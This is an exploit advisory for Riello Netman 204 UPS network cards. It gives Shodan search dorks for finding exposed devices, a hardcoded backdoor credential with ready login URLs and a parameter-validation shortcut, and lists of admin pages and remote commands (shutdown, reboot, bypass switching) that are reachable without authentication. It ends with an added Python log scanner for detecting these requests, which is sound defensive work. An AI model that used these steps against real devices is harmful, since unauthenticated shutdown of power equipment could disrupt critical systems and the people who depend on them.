# Exploit Title: Netman 204 - Broken Access Control Remote command
# Date: 1/28/2025
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204)
# Version: netman-204
# Tested on: Windows/Linux

Step 1: An attacker can use these dorks to find the UPS panel.

Shodan :   http.favicon.hash:22913038  OR  https://www.shodan.io/search?query=netman+204+cgi-bin

# We found two panels: Yellow and Blue

Step 2: For the Yellow panel, an attacker can use this username and password because there is a backdoor. For the Blue panel, we can use the remote commands and Burp Suite Repeater to see the details of the UPS.

Yellow panel: username and password: eurek

Some exploits for that:

http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek

Due to flaws in parameter validation, the URL can be shortened to:

http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek


Blue panel: username and password: admin

Some critical pages that leak information without authentication:

http://IP/administration-commands.html
http://IP/administration.html
http://IP/administration.html#
http://IP/administration.html#LDAP
http://IP/administration.html#active-users
http://IP/administration.html#firmware-upgrade
http://IP/configuration.html
http://IP/history.html
http://IP/index.html
http://IP/login.html
http://IP/system-overview.html
http://IP/table.html

# Using the paths above, we can see the details of the UPS without authentication.

First open Burp Suite and intercept the requests, then request the paths above. Send that request to Repeater, send it again, and open the Render tab of the response and enjoy :)

Some remote commands available without authentication:

http://IP/administration-commands.html
http://IP/administration-commands.html#
http://IP/administration-commands.html#reboot-irms
http://IP/administration-commands.html#reboot-mdu
http://IP/administration-commands.html#reboot-xts
http://IP/administration-commands.html#shutdown
http://IP/administration-commands.html#shutdown-irms
http://IP/administration-commands.html#shutdown-mdu
http://IP/administration-commands.html#shutdown-restore
http://IP/administration-commands.html#shutdown-restore-irms
http://IP/administration-commands.html#shutdown-restore-mdu
http://IP/administration-commands.html#shutdown-restore-xts
http://IP/administration-commands.html#shutdown-xts
http://IP/administration-commands.html#shutdownrestore
http://IP/administration-commands.html#switch-irms
http://IP/administration-commands.html#switch-on-bypass
http://IP/administration-commands.html#test-battery
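
A defender-side check for the requests described above, as an added example that is not part of the original advisory: it scans web access log lines for logins using the `eurek` credential (including the shortened `eurek%20eurek` form) and for hits on the listed administration pages from outside a management subnet. The log format (a reverse proxy in front of the card), the `10.0.50.0/24` subnet and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: a reverse proxy in front of the card writes combined-format logs.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')
MGMT_NET = ipaddress.ip_network("10.0.50.0/24")  # hypothetical management subnet
BACKDOOR_USER = "eurek"  # credential named in the advisory
# Pages the advisory lists as readable without authentication.
SENSITIVE_PAGES = {
    "/administration-commands.html", "/administration.html",
    "/configuration.html", "/history.html",
    "/system-overview.html", "/table.html",
}

def classify(line):
    """Return the finding tags for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    findings = []
    url = urlsplit(m["target"])
    path = url.path.lower()
    if path == "/cgi-bin/login.cgi":
        # parse_qs percent-decodes, so "eurek%20eurek" arrives as "eurek eurek".
        users = parse_qs(url.query).get("username", [])
        if any(BACKDOOR_USER in u.lower().split() for u in users):
            findings.append("backdoor-login")
    # URL fragments (#shutdown, ...) never reach the server; only the page path is logged.
    if path in SENSITIVE_PAGES:
        try:
            internal = ipaddress.ip_address(m["src"]) in MGMT_NET
        except ValueError:  # source was logged as a hostname
            internal = False
        if not internal:
            findings.append("admin-page-outside-mgmt-net")
    return findings

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Jan/2025:10:01:02 +0000] "GET /cgi-bin/login.cgi?username=eurek&password=eurek HTTP/1.1" 200 512',
    '203.0.113.7 - - [28/Jan/2025:10:01:09 +0000] "GET /cgi-bin/login.cgi?username=eurek%20eurek HTTP/1.1" 200 512',
    '198.51.100.20 - - [28/Jan/2025:10:02:30 +0000] "GET /administration-commands.html HTTP/1.1" 200 4096',
    '10.0.50.12 - - [28/Jan/2025:10:03:00 +0000] "GET /administration.html HTTP/1.1" 200 4096',
]

def scan(lines):
    """Return (line_number, findings) for every line with at least one finding."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]
```

Because the command anchors such as `#shutdown` stay in the browser, a hit on `administration-commands.html` in the log cannot be narrowed to a specific command from the URL alone.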